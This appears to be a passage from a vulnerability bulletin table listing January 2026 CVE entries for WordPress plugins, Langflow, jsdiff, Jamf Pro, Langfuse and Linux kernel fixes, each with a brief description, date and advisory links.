| Intermesh--groupoffice | Group-Office is an enterprise customer relationship management and groupware tool. In versions 6.8.148 and below, and 25.0.1 through 25.0.79, the application stores unsanitized filenames in the database, which can lead to Stored Cross-Site Scripting (XSS). Users who interact with these specially crafted file names within the Group-Office application are affected. While the scope is limited to the file-viewing context, it could still be used to interfere with user sessions or perform unintended actions in the browser. This issue is fixed in versions 6.8.149 and 25.0.80. | 2026-01-21 | not yet calculated | CVE-2026-23887 | https://github.com/Intermesh/groupoffice/security/advisories/GHSA-3gj5-gvvr-g6hp https://github.com/Intermesh/groupoffice/commit/3fa40d7edd31fbe33babe07061d5a14ad19ea40f https://github.com/Intermesh/groupoffice/commit/ac91b128157bc9c5ea015b6141ce71cd3bbc43f0 |
| Israpil--Textmetrics | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Israpil Textmetrics webtexttool allows Code Injection. This issue affects Textmetrics: from n/a through <= 3.6.3. | 2026-01-23 | not yet calculated | CVE-2026-24564 | https://patchstack.com/database/Wordpress/Plugin/webtexttool/vulnerability/wordpress-textmetrics-plugin-3-6-3-arbitrary-shortcode-execution-vulnerability?_s_id=cve |
| jagdish1o1--Delay Redirects | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jagdish1o1 Delay Redirects delay-redirects allows DOM-Based XSS. This issue affects Delay Redirects: from n/a through <= 1.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24632 | https://patchstack.com/database/Wordpress/Plugin/delay-redirects/vulnerability/wordpress-delay-redirects-plugin-1-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jahid Hasan--Admin login URL Change | Missing Authorization vulnerability in Jahid Hasan Admin login URL Change admin-login-url-change allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Admin login URL Change: from n/a through <= 1.1.5. | 2026-01-23 | not yet calculated | CVE-2026-24578 | https://patchstack.com/database/Wordpress/Plugin/admin-login-url-change/vulnerability/wordpress-admin-login-url-change-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve |
| Jamf--Jamf Pro | Authentication Bypass by Primary Weakness vulnerability in Jamf Jamf Pro allows unspecified impact. This issue affects Jamf Pro: from 11.20 through 11.24. | 2026-01-21 | not yet calculated | CVE-2026-1290 | https://learn.jamf.com/en-US/bundle/jamf-pro-release-notes-11.24.0/page/Resolved_Issues.html |
| jegtheme--JNews - Frontend Submit | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jegtheme JNews - Frontend Submit jnews-frontend-submit allows Reflected XSS. This issue affects JNews - Frontend Submit: from n/a through <= 11.0.0. | 2026-01-22 | not yet calculated | CVE-2025-68904 | https://patchstack.com/database/Wordpress/Plugin/jnews-frontend-submit/vulnerability/wordpress-jnews-frontend-submit-plugin-11-0-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| jegtheme--JNews - Pay Writer | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in jegtheme JNews - Pay Writer jnews-pay-writer allows PHP Local File Inclusion. This issue affects JNews - Pay Writer: from n/a through <= 11.0.0. | 2026-01-22 | not yet calculated | CVE-2025-68905 | https://patchstack.com/database/Wordpress/Plugin/jnews-pay-writer/vulnerability/wordpress-jnews-pay-writer-plugin-11-0-0-local-file-inclusion-vulnerability?_s_id=cve |
| jegtheme--JNews - Video | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jegtheme JNews - Video jnews-video allows Reflected XSS. This issue affects JNews - Video: from n/a through <= 11.0.2. | 2026-01-22 | not yet calculated | CVE-2025-68906 | https://patchstack.com/database/Wordpress/Plugin/jnews-video/vulnerability/wordpress-jnews-video-plugin-11-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Johan Jonk Stenström--Cookies and Content Security Policy | Insertion of Sensitive Information Into Sent Data vulnerability in Johan Jonk Stenström Cookies and Content Security Policy cookies-and-content-security-policy allows Retrieve Embedded Sensitive Data. This issue affects Cookies and Content Security Policy: from n/a through <= 2.34. | 2026-01-22 | not yet calculated | CVE-2025-63019 | https://patchstack.com/database/Wordpress/Plugin/cookies-and-content-security-policy/vulnerability/wordpress-cookies-and-content-security-policy-plugin-2-34-sensitive-data-exposure-vulnerability?_s_id=cve |
| John James Jacoby--WP Term Order | Cross-Site Request Forgery (CSRF) vulnerability in John James Jacoby WP Term Order wp-term-order allows Cross Site Request Forgery. This issue affects WP Term Order: from n/a through <= 2.1.0. | 2026-01-23 | not yet calculated | CVE-2026-24542 | https://patchstack.com/database/Wordpress/Plugin/wp-term-order/vulnerability/wordpress-wp-term-order-plugin-2-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Jthemes--xSmart | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jthemes xSmart xsmart allows Reflected XSS. This issue affects xSmart: from n/a through <= 1.2.9.4. | 2026-01-22 | not yet calculated | CVE-2025-50006 | https://patchstack.com/database/Wordpress/Theme/xsmart/vulnerability/wordpress-xsmart-theme-1-2-9-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jthemes--xSmart | Incorrect Privilege Assignment vulnerability in Jthemes xSmart xsmart allows Privilege Escalation. This issue affects xSmart: from n/a through <= 1.2.9.4. | 2026-01-22 | not yet calculated | CVE-2025-50007 | https://patchstack.com/database/Wordpress/Theme/xsmart/vulnerability/wordpress-xsmart-theme-1-2-9-4-privilege-escalation-vulnerability?_s_id=cve |
| Jthemes--xSmart | Missing Authorization vulnerability in Jthemes xSmart xsmart allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects xSmart: from n/a through <= 1.2.9.4. | 2026-01-22 | not yet calculated | CVE-2025-54002 | https://patchstack.com/database/Wordpress/Theme/xsmart/vulnerability/wordpress-xsmart-theme-1-2-9-4-broken-access-control-vulnerability?_s_id=cve |
| JV--HarfBuzz::Shaper | HarfBuzz::Shaper versions before 0.032 for Perl contain a bundled library with a null pointer dereference vulnerability. Versions before 0.032 contain HarfBuzz 8.4.0 or earlier bundled as hb_src.tar.gz in the source tarball, which is affected by CVE-2026-22693. | 2026-01-19 | not yet calculated | CVE-2026-0943 | https://bugzilla.redhat.com/show_bug.cgi?id=2429296 https://www.cve.org/CVERecord?id=CVE-2026-22693 https://metacpan.org/release/JV/HarfBuzz-Shaper-0.032/changes |
| Kaira--Blockons | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kaira Blockons blockons allows Stored XSS. This issue affects Blockons: from n/a through <= 1.2.15. | 2026-01-23 | not yet calculated | CVE-2026-24550 | https://patchstack.com/database/Wordpress/Plugin/blockons/vulnerability/wordpress-blockons-plugin-1-2-15-cross-site-scripting-xss-vulnerability?_s_id=cve |
| kamleshyadav--WP Lead Capturing Pages | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in kamleshyadav WP Lead Capturing Pages wp-lead-capture allows Blind SQL Injection. This issue affects WP Lead Capturing Pages: from n/a through <= 2.5. | 2026-01-22 | not yet calculated | CVE-2025-49050 | https://patchstack.com/database/Wordpress/Plugin/wp-lead-capture/vulnerability/wordpress-wp-lead-capturing-pages-plugin-2-5-sql-injection-vulnerability-2?_s_id=cve |
| kamleshyadav--WP Lead Capturing Pages | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in kamleshyadav WP Lead Capturing Pages wp-lead-capture allows Blind SQL Injection. This issue affects WP Lead Capturing Pages: from n/a through <= 2.5. | 2026-01-22 | not yet calculated | CVE-2025-49055 | https://patchstack.com/database/Wordpress/Plugin/wp-lead-capture/vulnerability/wordpress-wp-lead-capturing-pages-plugin-2-5-sql-injection-vulnerability?_s_id=cve |
| Kapil Chugh--My Post Order | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kapil Chugh My Post Order my-posts-order allows Reflected XSS. This issue affects My Post Order: from n/a through <= 1.2.1.1. | 2026-01-22 | not yet calculated | CVE-2025-68004 | https://patchstack.com/database/Wordpress/Plugin/my-posts-order/vulnerability/wordpress-my-post-order-plugin-1-2-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Kapil Paul--Payment Gateway bKash for WC | Missing Authorization vulnerability in Kapil Paul Payment Gateway bKash for WC woo-payment-bkash allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Payment Gateway bKash for WC: from n/a through <= 3.1.0. | 2026-01-22 | not yet calculated | CVE-2025-62754 | https://patchstack.com/database/Wordpress/Plugin/woo-payment-bkash/vulnerability/wordpress-payment-gateway-bkash-for-wc-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve |
| Katana Network--Development Starter Kit | Katana Network Development Starter Kit executeCommand Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Katana Network Development Starter Kit. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the executeCommand method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27786. | 2026-01-23 | not yet calculated | CVE-2026-0759 | ZDI-26-025 |
| kpdecker--jsdiff | jsdiff is a JavaScript text differencing implementation. Prior to versions 8.0.3, 5.2.2, and 4.0.4, attempting to parse a patch whose filename headers contain the line break characters `\r`, `\u2028`, or `\u2029` can cause the `parsePatch` method to enter an infinite loop. It then consumes memory without limit until the process crashes due to running out of memory. Applications are therefore likely to be vulnerable to a denial-of-service attack if they call `parsePatch` with a user-provided patch as input. A large payload is not needed to trigger the vulnerability, so size limits on user input do not provide any protection. Furthermore, some applications may be vulnerable even when calling `parsePatch` on a patch generated by the application itself if the user is nonetheless able to control the filename headers (e.g. by directly providing the filenames of the files to be diffed). The `applyPatch` method is similarly affected if (and only if) called with a string representation of a patch as an argument, since under the hood it parses that string using `parsePatch`. Other methods of the library are unaffected. Finally, a second and lesser interdependent bug - a ReDOS - also exhibits when those same line break characters are present in a patch's *patch* header (also known as its "leading garbage"). A maliciously-crafted patch header of length *n* can take `parsePatch` O(*n*³) time to parse. Versions 8.0.3, 5.2.2, and 4.0.4 contain a fix. As a workaround, do not attempt to parse patches that contain any of these characters: `\r`, `\u2028`, or `\u2029`. | 2026-01-22 | not yet calculated | CVE-2026-24001 | https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx https://github.com/kpdecker/jsdiff/issues/653 https://github.com/kpdecker/jsdiff/pull/649 https://github.com/kpdecker/jsdiff/commit/15a1585230748c8ae6f8274c202e0c87309142f5 |
| Kriesi--Enfold | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kriesi Enfold enfold allows DOM-Based XSS. This issue affects Enfold: from n/a through <= 7.1.3. | 2026-01-22 | not yet calculated | CVE-2025-68900 | https://patchstack.com/database/Wordpress/Theme/enfold/vulnerability/wordpress-enfold-theme-7-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| kutsy--AJAX Hits Counter + Popular Posts Widget | Missing Authorization vulnerability in kutsy AJAX Hits Counter + Popular Posts Widget ajax-hits-counter allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AJAX Hits Counter + Popular Posts Widget: from n/a through <= 0.10.210305. | 2026-01-23 | not yet calculated | CVE-2026-24587 | https://patchstack.com/database/Wordpress/Plugin/ajax-hits-counter/vulnerability/wordpress-ajax-hits-counter-popular-posts-widget-plugin-0-10-210305-broken-access-control-vulnerability?_s_id=cve |
| LambertGroup--Accordion Slider PRO | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Accordion Slider PRO accordion_slider_pro allows Reflected XSS. This issue affects Accordion Slider PRO: from n/a through <= 1.2. | 2026-01-22 | not yet calculated | CVE-2025-49066 | https://patchstack.com/database/Wordpress/Plugin/accordion_slider_pro/vulnerability/wordpress-accordion-slider-pro-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--HTML5 Video Player | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup HTML5 Video Player lbg-vp2-html5-bottom allows Reflected XSS. This issue affects HTML5 Video Player: from n/a through <= 5.3.5. | 2026-01-22 | not yet calculated | CVE-2025-27005 | https://patchstack.com/database/Wordpress/Plugin/lbg-vp2-html5-bottom/vulnerability/wordpress-html5-video-player-plugin-5-3-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--HTML5 Video Player with Playlist & Multiple Skins | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup HTML5 Video Player with Playlist & Multiple Skins lbg-vp2-html5-rightside allows Reflected XSS. This issue affects HTML5 Video Player with Playlist & Multiple Skins: from n/a through <= 5.3.5. | 2026-01-22 | not yet calculated | CVE-2025-32123 | https://patchstack.com/database/Wordpress/Plugin/lbg-vp2-html5-rightside/vulnerability/wordpress-html5-video-player-with-playlist-multiple-skins-plugin-5-3-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Image&Video FullScreen Background | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Image&Video FullScreen Background lbg_fullscreen_fullwidth_slider allows Reflected XSS. This issue affects Image&Video FullScreen Background: from n/a through <= 1.6.7. | 2026-01-22 | not yet calculated | CVE-2025-47666 | https://patchstack.com/database/Wordpress/Plugin/lbg_fullscreen_fullwidth_slider/vulnerability/wordpress-image-video-fullscreen-background-plugin-1-6-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Magic Responsive Slider and Carousel WordPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Magic Responsive Slider and Carousel WordPress magic_carousel allows Reflected XSS. This issue affects Magic Responsive Slider and Carousel WordPress: from n/a through <= 1.6. | 2026-01-22 | not yet calculated | CVE-2025-49043 | https://patchstack.com/database/Wordpress/Plugin/magic_carousel/vulnerability/wordpress-magic-responsive-slider-and-carousel-wordpress-plugin-1-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Magic Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Magic Slider magic_slider allows Reflected XSS. This issue affects Magic Slider: from n/a through <= 2.2. | 2026-01-22 | not yet calculated | CVE-2025-48094 | https://patchstack.com/database/Wordpress/Plugin/magic_slider/vulnerability/wordpress-magic-slider-plugin-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Universal Video Player | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Universal Video Player universal-video-player allows Reflected XSS. This issue affects Universal Video Player: from n/a through <= 3.8.4. | 2026-01-22 | not yet calculated | CVE-2025-69048 | https://patchstack.com/database/Wordpress/Plugin/universal-video-player/vulnerability/wordpress-universal-video-player-plugin-3-8-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Universal Video Player | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Universal Video Player universal-video-player allows Reflected XSS. This issue affects Universal Video Player: from n/a through <= 3.8.4. | 2026-01-22 | not yet calculated | CVE-2025-69053 | https://patchstack.com/database/Wordpress/Plugin/universal-video-player/vulnerability/wordpress-universal-video-player-plugin-3-8-4-reflected-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| LambertGroup--xPromoter | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup xPromoter top_bar_promoter allows Reflected XSS. This issue affects xPromoter: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-49046 | https://patchstack.com/database/Wordpress/Plugin/top_bar_promoter/vulnerability/wordpress-xpromoter-plugin-1-3-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Langflow--Langflow | Langflow code Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the code parameter provided to the validate endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27322. | 2026-01-23 | not yet calculated | CVE-2026-0768 | ZDI-26-034 |
| Langflow--Langflow | Langflow eval_custom_component_code Eval Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the eval_custom_component_code function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-26972. | 2026-01-23 | not yet calculated | CVE-2026-0769 | ZDI-26-035 |
| Langflow--Langflow | Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325. | 2026-01-23 | not yet calculated | CVE-2026-0770 | ZDI-26-036 |
| Langflow--Langflow | Langflow PythonFunction Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Attack vectors and exploitability will vary depending on the configuration of the product. The specific flaw exists within the handling of Python function components. Depending upon product configuration, an attacker may be able to introduce custom Python code into a workflow. An attacker can leverage this vulnerability to execute code in the context of the application. Was ZDI-CAN-27497. | 2026-01-23 | not yet calculated | CVE-2026-0771 | ZDI-26-037 |
| Langflow--Langflow | Langflow Disk Cache Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is required to exploit this vulnerability. The specific flaw exists within the disk cache service. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27919. | 2026-01-23 | not yet calculated | CVE-2026-0772 | ZDI-26-038 |
| langfuse--langfuse | Langfuse is an open source large language model engineering platform. In versions 3.146.0 and below, the /api/public/slack/install endpoint initiates Slack OAuth using a projectId provided by the client without authentication or authorization. The projectId is preserved throughout the OAuth flow, and the callback stores installations based on this untrusted metadata. This allows an attacker to bind their Slack workspace to any project and potentially receive changes to prompts stored in Langfuse Prompt Management. An attacker can replace existing Prompt Slack Automation integrations or pre-register a malicious one, though the latter requires an authenticated user to unknowingly configure it despite visible workspace and channel indicators in the UI. This issue has been fixed in version 3.147.0. | 2026-01-22 | not yet calculated | CVE-2026-24055 | https://github.com/langfuse/langfuse/security/advisories/GHSA-pvq7-vvfj-p98x https://github.com/langfuse/langfuse/commit/3adc89e4d72729eabef55e46888b8ce80a7e3b0a https://github.com/langfuse/langfuse/releases/tag/v3.147.0 https://langfuse.com/docs/prompt-management/features/webhooks-slack-integrations |
| launchinteractive--Merge + Minify + Refresh | Cross-Site Request Forgery (CSRF) vulnerability in launchinteractive Merge + Minify + Refresh merge-minify-refresh allows Cross Site Request Forgery. This issue affects Merge + Minify + Refresh: from n/a through <= 2.14. | 2026-01-22 | not yet calculated | CVE-2026-24384 | https://patchstack.com/database/Wordpress/Plugin/merge-minify-refresh/vulnerability/wordpress-merge-minify-refresh-plugin-2-14-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| LavaLite--LavaLite CMS | LavaLite CMS versions up to and including 10.1.0 contain a stored cross-site scripting vulnerability in the package creation and search functionality. Authenticated users can supply crafted HTML or JavaScript in the package Name or Description fields that is stored and later rendered without proper output encoding in package search results. When other users view search results that include the malicious package, the injected script executes in their browsers, potentially enabling session hijacking, credential theft, and unauthorized actions in the context of the victim. | 2026-01-23 | not yet calculated | CVE-2025-71177 | https://github.com/LavaLite/cms/issues/420 https://lavalite.org/ https://www.vulncheck.com/advisories/lavalite-cms-stored-xss-via-package-creation-and-search |
| LazyCoders LLC--LazyTasks | Incorrect Privilege Assignment vulnerability in LazyCoders LLC LazyTasks lazytasks-project-task-management allows Privilege Escalation. This issue affects LazyTasks: from n/a through <= 1.4.01. | 2026-01-22 | not yet calculated | CVE-2025-68869 | https://patchstack.com/database/Wordpress/Plugin/lazytasks-project-task-management/vulnerability/wordpress-lazytasks-plugin-1-2-37-privilege-escalation-vulnerability?_s_id=cve |
| Leap13--Premium Addons for Elementor | Missing Authorization vulnerability in Leap13 Premium Addons for Elementor premium-addons-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Premium Addons for Elementor: from n/a through <= 4.11.63. | 2026-01-22 | not yet calculated | CVE-2025-69300 | https://patchstack.com/database/Wordpress/Plugin/premium-addons-for-elementor/vulnerability/wordpress-premium-addons-for-elementor-plugin-4-11-63-settings-change-vulnerability?_s_id=cve |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: phy: isp1301: fix non-OF device reference imbalance A recent change fixing a device reference leak in a UDC driver introduced a potential use-after-free in the non-OF case as the isp1301_get_client() helper only increases the reference count for the returned I2C device in the OF case. Increment the reference count also for non-OF so that the caller can decrement it unconditionally. Note that this is inherently racy just as using the returned I2C device is since nothing is preventing the PHY driver from being unbound while in use. | 2026-01-23 | not yet calculated | CVE-2025-71145 | https://git.kernel.org/stable/c/43e58abad6c08c5f0943594126ef4cd6559aac0b https://git.kernel.org/stable/c/03bbdaa4da8c6ea0c8431a5011db188a07822c8a https://git.kernel.org/stable/c/75c5d9bce072abbbc09b701a49869ac23c34a906 https://git.kernel.org/stable/c/5d3df03f70547d4e3fc10ed4381c052eff51b157 https://git.kernel.org/stable/c/7501ecfe3e5202490c2d13dc7e181203601fcd69 https://git.kernel.org/stable/c/b4b64fda4d30a83a7f00e92a0c8a1d47699609f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conncount: fix leaked ct in error paths There are some situations where ct might be leaked as error paths are skipping the refcounted check and return immediately. In order to solve it make sure that the check is always called. | 2026-01-23 | not yet calculated | CVE-2025-71146 | https://git.kernel.org/stable/c/08fa37f4c8c59c294e9c18fea2d083ee94074e5a https://git.kernel.org/stable/c/e1ac8dce3a893641bef224ad057932f142b8a36f https://git.kernel.org/stable/c/f381a33f34dda9e4023e38ba68c943bca83245e9 https://git.kernel.org/stable/c/325eb61bb30790ea27782203a17b007ce1754a67 https://git.kernel.org/stable/c/0b88be7211d21a0d68bb1e56dc805944e3654d6f https://git.kernel.org/stable/c/4bd2b89f4028f250dd1c1625eb3da1979b04a5e8 https://git.kernel.org/stable/c/2e2a720766886190a6d35c116794693aabd332b6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KEYS: trusted: Fix a memory leak in tpm2_load_cmd 'tpm2_load_cmd' allocates a temporary blob indirectly via 'tpm2_key_decode' but it is not freed in the failure paths. Address this by wrapping the blob with a cleanup helper. | 2026-01-23 | not yet calculated | CVE-2025-71147 | https://git.kernel.org/stable/c/3fd7df4636d8fd5e3592371967a5941204368936 https://git.kernel.org/stable/c/af0689cafb127a8d1af78cc8b72585c9b2a19ecd https://git.kernel.org/stable/c/19166de9737218b77122c41a5730ac87025e089f https://git.kernel.org/stable/c/9b015f2918b95bdde2ca9cefa10ef02b138aae1e https://git.kernel.org/stable/c/9e7c63c69f57b1db1a8a1542359a6167ff8fcef1 https://git.kernel.org/stable/c/62cd5d480b9762ce70d720a81fa5b373052ae05f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/handshake: restore destructor on submit failure handshake_req_submit() replaces sk->sk_destruct but never restores it when submission fails before the request is hashed. handshake_sk_destruct() then returns early and the original destructor never runs, leaking the socket. Restore sk_destruct on the error path. | 2026-01-23 | not yet calculated | CVE-2025-71148 | https://git.kernel.org/stable/c/cd8cf2be3717137554744233fda051ffc09d1d44 https://git.kernel.org/stable/c/7b82a1d6ae869533d8bdb0282a3a78faed8e63dd https://git.kernel.org/stable/c/b225325be7b247c7268e65eea6090db1fc786d1f https://git.kernel.org/stable/c/6af2a01d65f89e73c1cbb9267f8880d83a88cee4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/poll: correctly handle io_poll_add() return value on update When the core of io_uring was updated to handle completions consistently and with fixed return codes, the POLL_REMOVE opcode with updates got slightly broken. If a POLL_ADD is pending and then POLL_REMOVE is used to update the events of that request, if that update causes the POLL_ADD to now trigger, then that completion is lost and a CQE is never posted. Additionally, ensure that if an update does cause an existing POLL_ADD to complete, that the completion value isn't always overwritten with -ECANCELED. For that case, whatever io_poll_add() set the value to should just be retained. | 2026-01-23 | not yet calculated | CVE-2025-71149 | https://git.kernel.org/stable/c/8b777ab48441b153502772ecfc78c107d4353f29 https://git.kernel.org/stable/c/0126560370ed5217958b85657b590ad25e8b9c00 https://git.kernel.org/stable/c/c1669c03bfbc2a9b5ebff4428eecebe734c646fe https://git.kernel.org/stable/c/13a8f7b88c2d40c6b33f6216190478dda95d385f https://git.kernel.org/stable/c/84230ad2d2afbf0c44c32967e525c0ad92e26b4e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: Fix refcount leak when invalid session is found on session lookup When a session is found but its state is not SMB2_SESSION_VALID, it indicates that no valid session was found, but the code fails to decrement the reference count acquired by the session lookup, which results in a reference count leak. This patch fixes the issue by explicitly calling ksmbd_user_session_put to release the reference to the session. | 2026-01-23 | not yet calculated | CVE-2025-71150 | https://git.kernel.org/stable/c/0fb87b28cafae71e9c8248432cc3a6a1fd759efc https://git.kernel.org/stable/c/e54fb2a4772545701766cba08aab20de5eace8cd https://git.kernel.org/stable/c/02e06785e85b4bd86ef3d23b7c8d87acc76773d5 https://git.kernel.org/stable/c/8cabcb4dd3dc85dd83a37d26efcc59a66a4074d7 https://git.kernel.org/stable/c/cafb57f7bdd57abba87725eb4e82bbdca4959644 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix memory and information leak in smb3_reconfigure() In smb3_reconfigure(), if smb3_sync_session_ctx_passwords() fails, the function returns immediately without freeing and erasing the newly allocated new_password and new_password2. This causes both a memory leak and a potential information leak. Fix this by calling kfree_sensitive() on both password buffers before returning in this error case. | 2026-01-23 | not yet calculated | CVE-2025-71151 | https://git.kernel.org/stable/c/bc390b2737205163e48cc1655f6a0c8cd55b02fc https://git.kernel.org/stable/c/5679cc90bb5415801fa29041da0319d9e15d295d https://git.kernel.org/stable/c/bb82aaee16907dc4d0b9b0ca7953ceb3edc328c6 https://git.kernel.org/stable/c/cb6d5aa9c0f10074f1ad056c3e2278ad2cc7ec8d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: properly keep track of conduit reference Problem description ------------------- DSA has a mumbo-jumbo of reference handling of the conduit net device and its kobject which, sadly, is just wrong and doesn't make sense. There are two distinct problems. 1. The OF path, which uses of_find_net_device_by_node(), never releases the elevated refcount on the conduit's kobject. Nominally, the OF and non-OF paths should result in objects having identical reference counts taken, and it is already suspicious that dsa_dev_to_net_device() has a put_device() call which is missing in dsa_port_parse_of(), but we can actually even verify that an issue exists. With CONFIG_DEBUG_KOBJECT_RELEASE=y, if we run this command "before" and "after" applying this patch: (unbind the conduit driver for net device eno2) echo 0000:00:00.2 > /sys/bus/pci/drivers/fsl_enetc/unbind we see these lines in the output diff which appear only with the patch applied: kobject: 'eno2' (ffff002009a3a6b8): kobject_release, parent 0000000000000000 (delayed 1000) kobject: '109' (ffff0020099d59a0): kobject_release, parent 0000000000000000 (delayed 1000) 2. After we find the conduit interface one way (OF) or another (non-OF), it can get unregistered at any time, and DSA remains with a long-lived, but in this case stale, cpu_dp->conduit pointer. Holding the net device's underlying kobject isn't actually of much help, it just prevents it from being freed (but we never need that kobject directly). What helps us to prevent the net device from being unregistered is the parallel netdev reference mechanism (dev_hold() and dev_put()). Actually we actually use that netdev tracker mechanism implicitly on user ports since commit 2f1e8ea726e9 ("net: dsa: link interfaces with the DSA master to get rid of lockdep warnings"), via netdev_upper_dev_link(). But time still passes at DSA switch probe time between the initial of_find_net_device_by_node() code and the user port creation time, time during which the conduit could unregister itself and DSA wouldn't know about it. So we have to run of_find_net_device_by_node() under rtnl_lock() to prevent that from happening, and release the lock only with the netdev tracker having acquired the reference. Do we need to keep the reference until dsa_unregister_switch() / dsa_switch_shutdown()? 1. Maybe yes. A switch device will still be registered even if all user ports failed to probe, see commit 86f8b1c01a0a ("net: dsa: Do not make user port errors fatal"), and the cpu_dp->conduit pointers remain valid. I haven't audited all call paths to see whether they will actually use the conduit in lack of any user port, but if they do, it seems safer to not rely on user ports for that reference. 2. Definitely yes. We support changing the conduit which a user port is associated to, and we can get into a situation where we've moved all user ports away from a conduit, thus no longer hold any reference to it via the net device tracker. But we shouldn't let it go nonetheless - see the next change in relation to dsa_tree_find_first_conduit() and LAG conduits which disappear. We have to be prepared to return to the physical conduit, so the CPU port must explicitly keep another reference to it. This is also to say: the user ports and their CPU ports may not always keep a reference to the same conduit net device, and both are needed. As for the conduit's kobject for the /sys/class/net/ entry, we don't care about it, we can release it as soon as we hold the net device object itself. History and blame attribution ----------------------------- The code has been refactored so many times, it is very difficult to follow and properly attribute a blame, but I'll try to make a short history which I hope to be correct. We have two distinct probing paths: - one for OF, introduced in 2016 i ---truncated--- | 2026-01-23 | not yet calculated | CVE-2025-71152 | https://git.kernel.org/stable/c/0e766b77ba5093583dfe609fae0aa1545c46dbbd https://git.kernel.org/stable/c/06e219f6a706c367c93051f408ac61417643d2f9 |
